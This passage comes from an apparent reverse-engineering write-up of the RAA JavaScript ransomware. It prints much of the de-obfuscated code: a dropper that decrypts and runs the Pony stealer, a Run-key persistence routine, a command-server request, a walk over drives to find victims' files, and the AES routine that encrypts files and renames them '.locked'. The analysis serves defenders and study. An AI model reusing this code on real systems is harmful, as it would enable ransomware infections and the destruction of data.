**tpcVJWrQG** here): \n\n\n```javascript\nfunction nYuMHHRx() {\n    var tpcVJWrQG = \"e1xy(...)OBBSDIO==\";\n    tpcVJWrQG = tpcVJWrQG.replace(/BBSDIO/g, \"A\");\n    var clear_tpcVJWrQG = CryptoJS.enc.Base64.parse(tpcVJWrQG);\n    var CLWSNdGnlGf = clear_tpcVJWrQG.toString(CryptoJS.enc.Utf8);\n    CLWSNdGnlGf = CLWSNdGnlGf.replace(/BBSDIO/g, \"A\");\n    var RRUm = new ActiveXObject('ADODB.Stream');\n    var GtDEcTuuN = WScript.CreateObject(\"WScript.shell\");\n    var TkTuwCGFLuv_save = GtDEcTuuN.SpecialFolders(\"MyDocuments\");\n    TkTuwCGFLuv_save = TkTuwCGFLuv_save + \"\\\\\" + \"doc_attached_\" + TBucypWw;\n    RRUm.Type = 2;\n    RRUm.Charset = \"437\";\n    RRUm.Open();\n    RRUm.WriteText(CLWSNdGnlGf);\n    RRUm.SaveToFile(TkTuwCGFLuv_save);\n    RRUm.Close();\n    var run = \"wordpad.exe \" + \"\\\"\" + TkTuwCGFLuv_save + \"\\\"\";\n    GtDEcTuuN.Run(run);\n    return 0;\n}\n```\n\nLet's go through it step by step.\n\n**tpcVJWrQG** contains very long Base64 encoded string. After a couple of operations with Regular Expressions and CryptoJS methods calls - finally we get RTF document (see **extracted/extracted_rtf.rtf** file)\n\nThen, those two lines use Windows Script Host methods to create some objects, one for creating file, second for creating an instance of executable shell:\n\n```javascript\nvar RRUm = new ActiveXObject('ADODB.Stream');\nvar GtDEcTuuN = WScript.CreateObject(\"WScript.shell\");\n```\n\nThis line:\n\n```javascript\nRRUm.Charset = \"437\";\n```\n\nallows JavaScript and _ADODB.Stream_ object to treat any binary data as string.\nThis definition is used across all RAA codebase many times.\n\nNext, a file is created with following path:\n\n```\n\\MyDocuments\\doc_atatched_xW5Gf\n```\n\nContent of previously generated RTF file is then saved at this path.\n\nFinally, following command is prepared:\n\n```\nvar run = wordpad.exe \"\\MyDocuments\\doc_atatched_xW5Gf\"\n```\n\nand executed by Windows Script Host using method Run():\n\n```\nGtDEcTuuN.Run(run);\n```\n( reference: https://msdn.microsoft.com/en-us/library/d5fk67ky(v=vs.84).aspx )\n\nAs a result, RTF document is displayed with some error message:\n\n![RTF document](extracted/extracted_rtf_screen.png)\n\n\nNext function is **NWvQtGjjfQX()** (I've truncated content of **data_pn** here): \n\n\n```javascript\nfunction NWvQtGjjfQX() {\n    var data_pn = \"TVrDiQNMSFE(...)QQURE\";\n\n    var cmd = \"U2FsdGVkX1/LHQl+aIAo/hXHDEI5YmZZtBIcL5LHq7o+NZyTxtiLAxCsucmN0NBq12nnNJ7XOCyeXqF9xLAkahyIcXx5oc/ic5FRpoj+tZ1qywTZNhPWMlRllGn8O8viVnpXMYHoJr/AphGHfaAOkX8xYjuWhZE8qw1Qw1vQbqdbMlv5RL3xTETBgbylCgyGER91Kef4Q/2YtokOqzg+0BZIjKpdIbr1jQdh8uwp9MKd+Y9dSm1Lz9dl82QJVVbFiBj7N6MEDCw5JESVi5HilHWFEb3eyacdJBxYtKutbAZBOl6aJrLyxKtlxm4o9Cie5+vIPgMtqHEmBWp9GaqYDQlxXXOuTeysry1LXQiCGP7msk2hqAOEhyfxchlAQuma4twTFqHOrPZDECk8hfVJkBvUZg/hl+y4gKbBBLVDEIlKW9AstpcAP6FOcTt/bsS+0fvHnl1fAtMB1AsBSHKhZX/6eMPBGQBQT5fqvyy8MLyMgLOsCt5XHyEgc2ecU1fDokpzzMxMqIPwFZoQDOZSg/pBOMVTyUHuv18WdWI+Q6lppzIUv4mvxEioH7SROiDFqJoHR4EwIdDO0QR82Q4RTTIWO9CfXkC5VnXlEncsU45rIzfEMDv4r1aqoYQlgFr6xjas0/e7+EVCoxhsp4C2Jta43NmC6uLnhjcWRdCcB/8=\";\n    var key_cmd = \"2c025c0a1a45d1f18df9ca3514babdbc\";\n    var dec_cmd = CryptoJS.AES.decrypt(cmd, key_cmd);\n    dec_cmd = CryptoJS.enc.Utf8.stringify(dec_cmd);\n    eval(dec_cmd);\n    return 0;\n}\n```\n\nThis function executes code with _eval()_ call...\n\n```javascript\n\teval(dec_cmd);\n```\n\n...which comes from decrypted **cmd** (with **key_cmd** key):\n\n```javascript\n\tvar key_cmd = \"2c025c0a1a45d1f18df9ca3514babdbc\";\n    var dec_cmd = CryptoJS.AES.decrypt(cmd, key_cmd);\n    dec_cmd = CryptoJS.enc.Utf8.stringify(dec_cmd); \n```\n\n\nThis code contains following instructions:\n\n```javascript\nvar flo = new ActiveXObject (\"ADODB.Stream\");\nvar runer = WScript.CreateObject(\"WScript.Shell\");\nvar wher = runer.SpecialFolders(\"MyDocuments\");\nwher = wher + \"\\\\\" + \"st.exe\";\nflo.CharSet = \"437\";\nflo.Open();\nvar pny = data_pn.replace(/NMSIOP/g, \"A\");\nvar pny_ar = CryptoJS.enc.Base64.parse(pny);\nvar pny_dec = pny_ar.toString(CryptoJS.enc.Utf8);\nflo.Position = 0;\nflo.SetEOS;\nflo.WriteText(pny_dec);\nflo.SaveToFile(wher, 2);\nflo.Close;\nwher = \"\\\"\" + wher + \"\\\"\";\nruner.Run(wher);\n```\n\nAgain, new ActiveXObject is created, named **flo**, and Windows Script Host Shell to execute file called **st.exe**:\n\nThen, **data_pn** from **NWvQtGjjfQX()** is decrypted and new file is created \"on the fly\":\n\n```javascript\nvar pny = data_pn.replace(/NMSIOP/g, \"A\");\nvar pny_ar = CryptoJS.enc.Base64.parse(pny);\nvar pny_dec = pny_ar.toString(CryptoJS.enc.Utf8);\n```\nI saved this file in extracted/ folder as **file01**. As I found here - https://reaqta.com/2016/06/raa-ransomware-delivering-pony/ - it contains malware called Pony (http://www.mcafee.com/threat-intelligence/malware/default.aspx?id=105468). After I found this information I've realized that its code comes from variable called **pny** (PoNY) Nice naming convention... :)\n\nNext, Pony is saved to file with previously created ADODB.Stream ActiveX object and executed.\nYou can find more information about Pony here: https://blog.malwarebytes.com/threat-analysis/2015/11/no-money-but-pony-from-a-mail-to-a-trojan-horse/\n\n--\n\n### Modify Windows registry\n\nNext function sets entry in Windows HKCU\\Software\\Microsoft\\Windows\\\\CurrentVersion\\Run\\ registry key.\n\nIt uses _WScript.Shell_ object from Windows Script Host. It allows to read Windows registry entries (with _RegRead_ method - see https://msdn.microsoft.com/en-us/library/x05fawxd(v=vs.84).aspx).\n\n```javascript\nfunction zQqUzoSxLQ() {\n    var QCY;\n    var kHkyz = WScript.CreateObject(\"WScript.Shell\");\n    try {\n        kHkyz.RegRead(\"HKCU\\\\RAA\\\\Raa-fnl\\\\\");\n    } catch (e) {\n        QCY = 0;\n    }\n    var lCMTwJKZ = [];\n    var baZk = \"wscript.exe\";\n    var AFtKLHIjDtkM = 0;\n    var e = new Enumerator(GetObject(\"winmgmts:\").InstancesOf(\"Win32_process\"));\n    for (; !e.atEnd(); e.moveNext()) {\n        var p = e.item();\n        lCMTwJKZ = lCMTwJKZ + p.Name + \",\";\n    }\n    lCMTwJKZ = lCMTwJKZ.split(\",\");\n    var jcayrm = -1;\n    do {\n        jcayrm += 1;\n        if (lCMTwJKZ[jcayrm] == baZk) {\n            AFtKLHIjDtkM = AFtKLHIjDtkM + 1;\n        } else {\n            null\n        }\n    } while (jcayrm < lCMTwJKZ.length);\n    if (AFtKLHIjDtkM < 2 && QCY == 0) {\n        var TKVUdGUkzCmE = WScript.ScriptFullName;\n        TKVUdGUkzCmE = TKVUdGUkzCmE + \" argument\";\n        var qPOGRFfINeNb = WScript.CreateObject(\"WScript.Shell\");\n        qPOGRFfINeNb.RegWrite(\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\", TKVUdGUkzCmE, \"REG_SZ\");\n        HxBG();\n    } else {\n        null;\n    }\n    return 0;\n}\n```\n\nAt the beginning, code checks if there's an entry in Windows registry at _HKCU\\RAA\\Raa-fnl_ path. If not, **QCY** variable is set to 0.\n\nNext couple of lines check list of run processes:\n\n```javascript\n// e is an iterator which allows to enumerate running processes\nvar e = new Enumerator(GetObject(\"winmgmts:\").InstancesOf(\"Win32_process\"));\n```\n\nLast part of the function checks if there are currently running **wscript.exe** processes and, under some conditions (eg. if previous _check_ is equal to 0) adds new Registry value under _HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\_ key, then **HxBG()** function is run.\n\n--\n\n### Connect to the server\n\nLast part of RAA code contains two very long functions, **HxBG()** and **izzU()**\n\nFirst, let's take a look at **izzU()**. \n\nIt starts from generating GUID, from within string contains 36 chars is cut and assigned to **cVjZujcP**. This value is used later.\n\n```\nGlobally Unique Identifier or GUID is a 128-bit integer (16 bytes) \nthat is used by some software applications across all computers and \nnetworks in order to provide a reference number which is unique or \nto identify a particular component. Because of this there's a very \nlow probability that any two or more component has the same value.\n\nGUID is also used in Windows Registry.\n\nMore info:\nhttps://msdn.microsoft.com/en-us/library/windows/desktop/aa373931(v=vs.85).aspx\n\n```\n\nHere's the code which generates GUID:\n\n```javascript\n var FknDierotSzK = new ActiveXObject(\"Scriptlet.TypeLib\");\n var cVjZujcP = FknDierotSzK.GUID.substr(1, 36);\n```\n\nNext thing is to initialize **KrvABjTTXNS** array with values read from remote server. Function **get_HZtSmFNRdJM()**, which is responsible for this part, contains hardcoded url, with **id** argument passed via GET:\n\n```javascript\nvar VuSD = cVjZujcP + \" - RAA\";\nvar MOSKn = [];\nMOSKn[0] = \"http://startwavenow.com/cmh\" + \"/mars.php?id=\" + VuSD;\n```\n\nServer IP address (188.40.248.65) is a part of a network located in Germany (?), owned by Romanian hosting company THC Projects. Those information were valid on 14.07.2016, when this part of my writeup was created.\n\n\n```\n\n% Abuse contact for '188.40.248.64 - 188.40.248.95' is 'abuse@hetzner.de'\n\ninetnum:        188.40.248.64 - 188.40.248.95\nnetname:        HOS-131355\ndescr:          HOS-131355\ncountry:        DE\nadmin-c:        STPS1-RIPE\ntech-c:         STPS1-RIPE\nstatus:         ASSIGNED PA\nmnt-by:         HOS-GUN\ncreated:        2015-07-21T01:16:26Z\nlast-modified:  2015-07-21T01:16:26Z\nsource:         RIPE # Filtered\n\nperson:         SC THC Projects SRL\naddress:        str complexului 3\naddress:        207206 Carcea\naddress:        ROMANIA\nphone:          +40743216666\nnic-hdl:        STPS1-RIPE\nremarks:        For abuse contact abuse@thcservers.com or visit https://www.thcservers.com\nabuse-mailbox:  abuse@thcservers.com\nmnt-by:         HOS-GUN\ncreated:        2014-11-30T13:42:54Z\nlast-modified:  2014-11-30T13:42:54Z\nsource:         RIPE # Filtered\n```\n\n\nI could not check what server returns, because this particular account was suspended. In next line, _ServerXMLHTTP_ object is created to communicate with remote machine. Next couple of lines set timeouts for **req** object (see https://msdn.microsoft.com/en-us/library/ms760403(v=vs.85).aspx for details):\n\n```javascript\nvar req = new ActiveXObject(\"Msxml2.ServerXMLHTTP.6.0\");\nvar QSJCTxMMl = 15000;\nvar bFPwcaPNy = 15000;\nvar zarI = 15000;\nvar olWVonsDzH = 15000;\nreq.setTimeouts(QSJCTxMMl, bFPwcaPNy, zarI, olWVonsDzH);\n```\n\nFollowing code uses Ajax HTTP GET call to receive some data from remote machine:\n\n```javascript\n(...)\nvar MOSKn = [];\nMOSKn[0] = \"http://startwavenow.com/cmh\" + \"/mars.php?id=\" + VuSD;\n(...)\nvar pointer_MOSKn = -1;\nvar aka;\ndo {\n    pointer_MOSKn += 1;\n    if (pointer_MOSKn <= 0) {\n        pointer_MOSKn = pointer_MOSKn;\n    } else {\n        pointer_MOSKn = 0;\n        WScript.Sleep(60000);\n    }\n    try {\n        req.open(\"GET\", MOSKn[pointer_MOSKn], false);\n        req.send();\n        aka = req.responseText.split(',');\n    } catch (e) {\n        aka = 0;\n    }\n} while (aka == 0);\nreturn aka;\n```\n\nIf we take a look at this fragment a little bit closer, it does not have a lot of sense. Take a look at how **MOSKn** array is used - only its first element is initalized and then, inside _do...while()_ loop, only 0 index is in use (if we follow  **pointer_MOSKn**, its value is always 0).\n\nBecause **aka** value changes after first request, I couldn't check what exactly is returned as startwavenow.com domain was already suspended and url does not respond, but I found an information in ReaQta writeup that there were some values used in encryption phase later - see https://reaqta.com/2016/06/raa-ransomware-delivering-pony/ for more details. \n\nAfter **get_HZtSmFNRdJM()** function there's code assigns returned values to an array:\n\n```javascript\nvar KrvABjTTXNS = [];\nKrvABjTTXNS = get_HZtSmFNRdJM();\nvar VKw = KrvABjTTXNS[0];\nvar jOnaTnksWb = KrvABjTTXNS[1];\n```\n\n--\n\n### Identify drives, folders and files\n\nNext executable fragment of the code contains another array initialization and assignment result of **kth()** function to its first element:\n\n```javascript\nvar kAgTDYi = [];\nkAgTDYi[0] = kth();\n```\n\nSo let's see now what is going on inside **kth()**:\n\n\n```javascript\nfunction kth() {\n    var DmYbWSaT, s, n, e, sNaZfrOWc;\n    DmYbWSaT = new ActiveXObject(\"Scripting.FileSystemObject\");\n    e = new Enumerator(DmYbWSaT.Drives);\n    s = [];\n    RKsqOBz:   for (; !e.atEnd(); e.moveNext()) {\n        sNaZfrOWc = e.item();\n        if (sNaZfrOWc.IsReady) {\n            sNaZfrOWc = sNaZfrOWc += \"\\\\\\\\\";\n            s.push(sNaZfrOWc);\n        } else\n            continue RKsqOBz;\n    }\n    return (s);\n}\n\n```\n\nThis is the first function where I found real example of how labels can be used to immediately escape from _for_ loop. ```continue RKsqOBz;``` instruction causes JavaScript interpreter to immediately jump off the loop, right to ```RKsqOBz:``` label definition.\n\nThis language construct is equivalent to other languages _goto_ instruction. It's not a good habit to use such instructions as it's hard to follow execution flow of the program and is very error prone. And, if the code is well organized, it's absolutely unnecessary to use any _goto_-like construct. But I am pretty sure that those arguments aren't accurate for RAA.\n    \nYou can read more about how to use labels in JavaScript here: http://devdocs.io/javascript/statements/label\n\nOk, go back to our function.\n\nAt the beginning there's _FileSystemObject_ created. As we can find on MSDN documentation page:\n\n```\nMain object. Contains methods and properties that allow you to \ncreate, delete, gain information about, and generally manipulate \ndrives, folders, and files. Many of the methods associated with this \nobject duplicate those in other FSO objects; they are provided for \nconvenience.\n```\n(https://msdn.microsoft.com/en-us/library/95dtkhsz(v=vs.84).aspx)\n\nThen, _Enumerator_ property is instantiated and standard method to detect all drives is used (you can follow similar example on https://msdn.microsoft.com/en-us/library/832c8c0x(v=vs.84).aspx)\nFinally, array contains all drives letters is returned.\n\n\nNext fragment which is executed is:\n\n```javascript\niKTzQKbfDJs();\nkAgTDYi[1] = [];\n```\n\n\nFunction **iKTzQKbfDJs()** calls two other functions, **OFTEml()** and **YlDrqb()** - let's follow both of them to get the final result of their execution:\n\n```javascript\nfunction iKTzQKbfDJs() {\n    var mItZKEXYwE = [];\n    mItZKEXYwE = kAgTDYi[0];\n    mItZKEXYwE = OFTEml(mItZKEXYwE);\n    var rjTvWjMKnGpI = -1;\n    do {\n        rjTvWjMKnGpI += 1;\n        YlDrqb(mItZKEXYwE[rjTvWjMKnGpI]);\n    } while (rjTvWjMKnGpI < mItZKEXYwE.length - 1);\n    return 0\n}\n```\n\nFirst, **mItZKEXYwE** array is created and its value is simply the first element of **kAgTDYi**, which is previously returned list of drives from **kth()** .\nThis array contains drives letters is passed as an argument to function **OFTEml()**:\n\n\n```javascript\nfunction OFTEml(array_to_clean) {\n    var pjvsEz = new Array();\n    for (var i = 0; i < array_to_clean.length; i++) {\n        if (array_to_clean[i]) {\n            pjvsEz.push(array_to_clean[i]);\n        }\n    }\n    return pjvsEz;\n}\n\n```\n\nThis short function returns all not empty (eg. strings like \"\") elements from array passed as argument.\n\nNext function **YlDrqb()**, is called for every element of cleaned by **OFTEml()** array (in other words: is executed for each drive)\n\n```javascript\nfunction YlDrqb(kth) {\n    var gg = new ActiveXObject(\"Scripting.FileSystemObject\");\n    var dir = kth + \"!!!README!!!\" + TBucypWw + \".rtf\";\n    var d2 = gg.CreateTextFile(dir, true);\n    d2.Write(VGCDtihB());\n    d2.Close();\n    return 0;\n}\n```\nAgain, _FileSystemObject_ is used to create file with following example name on each drive, and it writes to those files content created by function **VGCDtihB()**:\n\n```\nC!!!README!!!xW5Gf.rtf\n```\n\nWhy **xW5Gf** in filename? Remember function which generates random key, from the very beginning of RAA execution? Here's where this key is used (see 'The beginning' above).\n\nFunction **VGCDtihB()** generates another _rtf_ file with ransomware payment note - you can see this file on ReaQta writeup (https://reaqta.com/wp-content/uploads/2016/06/RAA_Ransomware_build_refund_file.png - as I was not able to generate those files on my machine)\n\n\n```javascript\n\nfunction VGCDtihB() {\n    var rftKZajp = \"e1xydG(...)QoRAASEP\";\n    var cUNSPAqZAE = rftKZajp.replace(/RAASEP/g, \"A\");\n    cUNSPAqZAE = CryptoJS.enc.Base64.parse(cUNSPAqZAE);\n    cUNSPAqZAE = cUNSPAqZAE.toString(CryptoJS.enc.Utf8);\n    cUNSPAqZAE = cUNSPAqZAE.replace(/=IDHERE=/g, cVjZujcP);\n    cUNSPAqZAE = cUNSPAqZAE.replace(/=ADRHERE=/g, jOnaTnksWb);\n    return cUNSPAqZAE;\n}\n``` \n\nAs you can see, it uses similar method as for first _rtf_ file: some simple Base64 string manipulation with couple of replace() function with Regular Expression calls.\n\n\nNext, there is **PLnEyqCPKHV()** function call, which is the main loop encrypting each file through **KWgwJwOlqJcs()** function described later:\n\n```javascript\nfunction PLnEyqCPKHV() {\n    var sNaZfrOWc = nXmsNjMpKTv(kAgTDYi);\n    var NBMCuybDY = -1;\n    iFIS:do {\n        NBMCuybDY += 1;\n        try {\n            KWgwJwOlqJcs(sNaZfrOWc[NBMCuybDY]);\n        } catch (e) {\n            continue iFIS;\n        }\n    } while (NBMCuybDY <= sNaZfrOWc.length - 2);\n    return 0\n}\n\nPLnEyqCPKHV();\n```\n\n**sNaZfrOWc** array is initialized by **nXmsNjMpKTv()** function, with our previously generated list of drives **kAgTDYi** from **kth()** function:\n\n```javascript\nfunction nXmsNjMpKTv(kAgTDYi) {\n    var EPtLPm = -1;\n    var wVgUUZeM = -1;\n    do {\n        EPtLPm += 1;\n        var LeDOaP = LMz(kAgTDYi[0][EPtLPm]);\n        var LeDOaP = LeDOaP.split(TBucypWw);\n        kAgTDYi[1] = kAgTDYi[1].concat(LeDOaP);\n        kAgTDYi[1] = OFTEml(kAgTDYi[1]);\n        var aZKH = HHiAp(kAgTDYi[0][EPtLPm]);\n        var aZKH = aZKH.split(TBucypWw);\n        kAgTDYi[0] = kAgTDYi[0].concat(aZKH);\n        kAgTDYi[0] = OFTEml(kAgTDYi[0]);\n    } while (EPtLPm <= kAgTDYi[0].length - 2);\n    return (kAgTDYi[1]);\n}\n\n```\n\nIn function above, there's interesting way how to define counter for _do...while_ loop. **EPtLPm** starts not from 0 or 1, but from -1. In loop condition, value of **EPtLPm** is compared with length of **kAgTDYi** array minus 2. I suppose this is some kind of obfuscation _do...while_ loop, but I am only guessing here.\n\n**LMz()** function is executed for every drive (drives are stored in element of index 0 and this element is also an array - that is why \n**kAgTDYi[0][EPtLPm]** is used)\n\n**LMz()** contains a lot of _if..else if_ conditions. The only purpose of this function is to iterate over all files on drive and create one, long string with filenames of particular types (images, MS Office documents, PDF files, Zip archives, Photoshop files - do you see variables initialized by strings containing some popular files extensions in function body?). Those filenames are concatenated together with **TBucypWw** key as separator, which is then used to split this string into array in the next line in **nXmsNjMpKTv()**.\n\nExtensions such as _.locked_ are omitted.\n\nNext, as new element of **kAgTDYi** a new array is build from all previously generated arrays with filenames (in other words: _concat()_ joins array with filenames extracted from actual drive with current value of **kAgTDYi[1]**).\n\nNext, quick cleanup is performed on those list - all empty entries are removed:\n\n```javascript\nfunction OFTEml(array_to_clean) {\n    var pjvsEz = new Array();\n    for (var i = 0; i < array_to_clean.length; i++) {\n        if (array_to_clean[i]) {\n            pjvsEz.push(array_to_clean[i]);\n        }\n    }\n    return pjvsEz;\n}\n```\n\nFunction **HHiAp()** performs similar operation like **LMz()**, but with folder names rather than files. It creates and returns a list of all folders on each drive, which names are not in defined set. In other way - encryption does not include system folders like _WINDOWS_, _RECYCLER_, _Program Files_, _Temp_, _AppData_ and similar.\n\nFinally, **nXmsNjMpKTv()** returns an array contains all filenames from each drive of an infected machine.\n\n\n--\n\n### Last step - encryption of files\n\nFunction **KWgwJwOlqJcs()** finishes whole process. This function is called in the loop in **PLnEyqCPKHV()** (one iteration per each file) with file name passed as an argument.\n\n**KWgwJwOlqJcs()** contains a couple of private scoped functions with the one responsible for encryption:\n\n```javascript\nfunction ukBnxEOtjm(EQs) {\n    var HZtSmFNRdJM = HZtSmFNRdJM_data[1];\n    var gmCRXSMsLyM = qPCIyff[1];\n    EQs = CryptoJS.AES.encrypt(EQs, HZtSmFNRdJM, {gmCRXSMsLyM: gmCRXSMsLyM});\n    return EQs;\n}\n```\n\nTo this function goes every single file which RAA wants to encrypt.\n\nBut before any file goes through those four lines, a lot of other things is happening. Let's go through them step by step.\n\nFirst, two variables are initialized with values returned from **rStinsVp()** function:\n\n```javascript\nvar HZtSmFNRdJM_data = rStinsVp(VKw);\nvar qPCIyff = rStinsVp(VKw);\n```\n\n**rStinsVp()** function takes one argument, **VKw**, which is one of two values returned from remote server (see 'Connect to the server\n' part of this writeup with **get_HZtSmFNRdJM()** function description above).\n\n\n```javascript\nfunction rStinsVp(rand) {\n    var eqQu = [];\n    var EPtLPmand = -1;\n    do {\n        EPtLPmand += 1;\n        eqQu[EPtLPmand] = Math.floor((Math.random() * 2000) + 1);\n        if (eqQu[EPtLPmand] < 10) {\n            eqQu[EPtLPmand] = \"000\" + eqQu[EPtLPmand];\n        } else if (eqQu[EPtLPmand] >= 10 && eqQu[EPtLPmand] < 100) {\n            eqQu[EPtLPmand] = \"00\" + eqQu[EPtLPmand];\n        } else if (eqQu[EPtLPmand] >= 100 && eqQu[EPtLPmand] < 1000) {\n            eqQu[EPtLPmand] = \"0\" + eqQu[EPtLPmand];\n        } else {\n            eqQu[EPtLPmand] = eqQu[EPtLPmand];\n        }\n    } while (eqQu.length < 32);\n    var xjLCtcIO = \"\";\n    var EPtLPmand2 = -1;\n    var vPdyagHuFMMj = [];\n    do {\n        EPtLPmand2 += 1;\n        vPdyagHuFMMj[EPtLPmand2] = parseInt(eqQu[EPtLPmand2]);\n        xjLCtcIO = xjLCtcIO + rand.charAt(vPdyagHuFMMj[EPtLPmand2]);\n    } while (xjLCtcIO.length < 32);\n    var gieJISwveNlD = [];\n    gieJISwveNlD[0] = eqQu;\n    gieJISwveNlD[1] = xjLCtcIO;\n    return gieJISwveNlD;\n}\n```\n\nLogic of this function is quite simple: it returns an array with two elements: first is another array with 32 4-digits numbers and second one is 32 characters length string.\n\nI ran this function and as argument I've passed some random MD5 hash. Results were similar for any other strings as well:\n\n```javascript\n// rStinsVp.js file content\nconsole.log(rStinsVp(\"c2378574f4fa4a4353d1ab7e2961fd88\"));\n```\n\n```\n$ node rStinsVp.js\n[ [ '0981',\n    '0829',\n    '0272',\n    '0715',\n    '0045',\n    '0193',\n    '0881',\n    1361,\n    1517,\n    '0957',\n    '0546',\n    '0621',\n    '0932',\n    1659,\n    1102,\n    1861,\n    '0339',\n    1688,\n    '0941',\n    '0756',\n    1727,\n    '0257',\n    '0565',\n    1963,\n    '0912',\n    '0333',\n    '0269',\n    1095,\n    1191,\n    1962,\n    '0514',\n    '0939' ],\n  'cccccccccccccccccccccccccccccccc' ]\n```\nIn real execution **HZtSmFNRdJM_data** and **qPCIyff** should contains some similar results as above. As I mentioned earlier - I can't check this as there's no way to get real values from remote server.\n\n\nNext call is **udpIHxNm()** function, which takes as an argument name of the file to encrypt (from list of files generated in function **nXmsNjMpKTv()**; each file is passed here through _do..while_ loop in **PLnEyqCPKHV()** to the function **KWgwJwOlqJcs()** called per each file name).\n\n\n```javascript\nfunction udpIHxNm(IMhTname) {\n    var SlSPWu = WScript.CreateObject(\"ADODB.Stream\");\n    SlSPWu.CharSet = '437';\n    SlSPWu.Open();\n    SlSPWu.LoadFromFile(IMhTname);\n    var hXpHGpZ = [];\n    hXpHGpZ[0] = [];\n    hXpHGpZ[1] = [];\n    var PRuJZyAvfeza = SlSPWu.Size;\n    if (PRuJZyAvfeza > 6122 && PRuJZyAvfeza < 5000000) {\n        var GinRqOjln = OQlYdejWlC(2000, 2040);\n        hXpHGpZ[0][0] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n        var kWsAN = Math.floor(PRuJZyAvfeza / 2) - 3060;\n        hXpHGpZ[1][0] = SlSPWu.ReadText(kWsAN) + \"RAA-SEP\";\n        hXpHGpZ[0][1] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n        var iPZDBPG = PRuJZyAvfeza - (SlSPWu.Position + GinRqOjln);\n        hXpHGpZ[1][1] = SlSPWu.ReadText(iPZDBPG) + \"RAA-SEP\";\n        hXpHGpZ[0][2] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n        SlSPWu.Close;\n        jMvqmKSQu(hXpHGpZ);\n    } else if (PRuJZyAvfeza > 5000000 && PRuJZyAvfeza <= 500000000) {\n        qqJ(IMhTname)\n    } else if (PRuJZyAvfeza <= 6122) {\n        hXpHGpZ[0][0] = SlSPWu.ReadText;\n        SlSPWu.Close;\n        jMvqmKSQu(hXpHGpZ);\n    } else {\n        hXpHGpZ = 0;\n        SlSPWu.Close;\n        jMvqmKSQu(hXpHGpZ);\n    }\n    return 0;\n}\n\nudpIHxNm(IMhTname);\n```\n\nAgain, let's analyze this code line by line, because some interesting things are going on here.\n\nFirst, Windows Script object to manipulate file is initialized and file is loaded and its size is checked:\n\n```javascript\nvar SlSPWu = WScript.CreateObject(\"ADODB.Stream\");\nSlSPWu.CharSet = '437';\nSlSPWu.Open();\nSlSPWu.LoadFromFile(IMhTname);\nvar hXpHGpZ = [];\nhXpHGpZ[0] = [];\nhXpHGpZ[1] = [];\nvar PRuJZyAvfeza = SlSPWu.Size;\n\n```\n\nBased on file size, different next step is being performed:\n\n```javascript\nif (PRuJZyAvfeza > 6122 && PRuJZyAvfeza < 5000000) {\n    var GinRqOjln = OQlYdejWlC(2000, 2040);\n    hXpHGpZ[0][0] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n    var kWsAN = Math.floor(PRuJZyAvfeza / 2) - 3060;\n    hXpHGpZ[1][0] = SlSPWu.ReadText(kWsAN) + \"RAA-SEP\";\n    hXpHGpZ[0][1] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n    var iPZDBPG = PRuJZyAvfeza - (SlSPWu.Position + GinRqOjln);\n    hXpHGpZ[1][1] = SlSPWu.ReadText(iPZDBPG) + \"RAA-SEP\";\n    hXpHGpZ[0][2] = SlSPWu.ReadText(GinRqOjln) + \"RAA-SEP\";\n    SlSPWu.Close;\n    jMvqmKSQu(hXpHGpZ);\n} else if (PRuJZyAvfeza > 5000000 && PRuJZyAvfeza <= 500000000) {\n    qqJ(IMhTname)\n} else if (PRuJZyAvfeza <= 6122) {\n    hXpHGpZ[0][0] = SlSPWu.ReadText;\n    SlSPWu.Close;\n    jMvqmKSQu(hXpHGpZ);\n} else {\n    hXpHGpZ = 0;\n    SlSPWu.Close;\n    jMvqmKSQu(hXpHGpZ);\n}\n```\n* if file size is between 6122 bytes and 4,76 MB (exactly 4882 kB) - then **hXpHGpZ** array is created, and some random values with \"RAA-SEP\" string appended to them are stored in this array. Next, this array is passed as an argument to **jMvqmKSQu()** function.\n\n* if file size is more than 4,76 MB and less than 476 MB - **qqJ()** function is called with file name as an argument\n\n* otherwise, if file size is less than or equal 6122 bytes - file content read in line:\n\n```\nhXpHGpZ[0][0] = SlSPWu.ReadText;\n``` \n\nand **hXpHGpZ** array is passed to **jMvqmKSQu()** function. \n\nFiles bigger than 476 MB are ommited.\n\nLet's see what **jMvqmKSQu()** and **qqJ()** called here are doing:\n\n```javascript\nfunction jMvqmKSQu(hXpHGpZ) {\n    if (hXpHGpZ[1].length != 0) {\n        var DftonCbPCyQR = hXpHGpZ[0].join(\"\");\n        DftonCbPCyQR = ukBnxEOtjm(DftonCbPCyQR);\n        DftonCbPCyQR = DftonCbPCyQR + \"=END=OF=HEADER=\";\n        DftonCbPCyQR = DftonCbPCyQR + hXpHGpZ[1].join(\"\") + \"IDNUM=\" + cVjZujcP + \"KEY_LOGIC=\" + HZtSmFNRdJM_data[0] + \"IV_LOGIC=\" + qPCIyff[0] + \"LOGIC_ID=1\";\n        omaDplUyHou(DftonCbPCyQR);\n    } else if (hXpHGpZ == 0) {\n        var DftonCbPCyQR = 0;\n        omaDplUyHou(DftonCbPCyQR);\n    } else {\n        var DftonCbPCyQR = hXpHGpZ[0][0];\n        DftonCbPCyQR = ukBnxEOtjm(DftonCbPCyQR);\n        DftonCbPCyQR = DftonCbPCyQR + \"IDNUM=\" + cVjZujcP + \"KEY_LOGIC=\" + HZtSmFNRdJM_data[0] + \"IV_LOGIC=\" + qPCIyff[0] + \"LOGIC_ID=2\";\n        omaDplUyHou(DftonCbPCyQR);\n    }\n    return DftonCbPCyQR;\n}\n```\n\nDepends on content of **hXpHGpZ**, which can be two dimensional array or 0, different actions are taken. Anyway, finally file is being encrypted in function **ukBnxEOtjm()** and after that **omaDplUyHou()** function is called:\n\n```javascript\nfunction omaDplUyHou(lsYZxzUm) {\n    var IxC = new ActiveXObject('ADODB.Stream');\n    IxC.Type = 2;\n    IxC.Charset = \"437\";\n    IxC.Open();\n    if (lsYZxzUm != 0) {\n        IxC.WriteText(lsYZxzUm);\n        IxC.SaveToFile(IMhTname, 2);\n        IxC.Close();\n        var DmYbWSaT = new ActiveXObject(\"Scripting.FileSystemObject\");\n        DmYbWSaT.MoveFile(IMhTname, IMhTname += \".locked\");\n    } else {\n        IxC.Close();\n    }\n  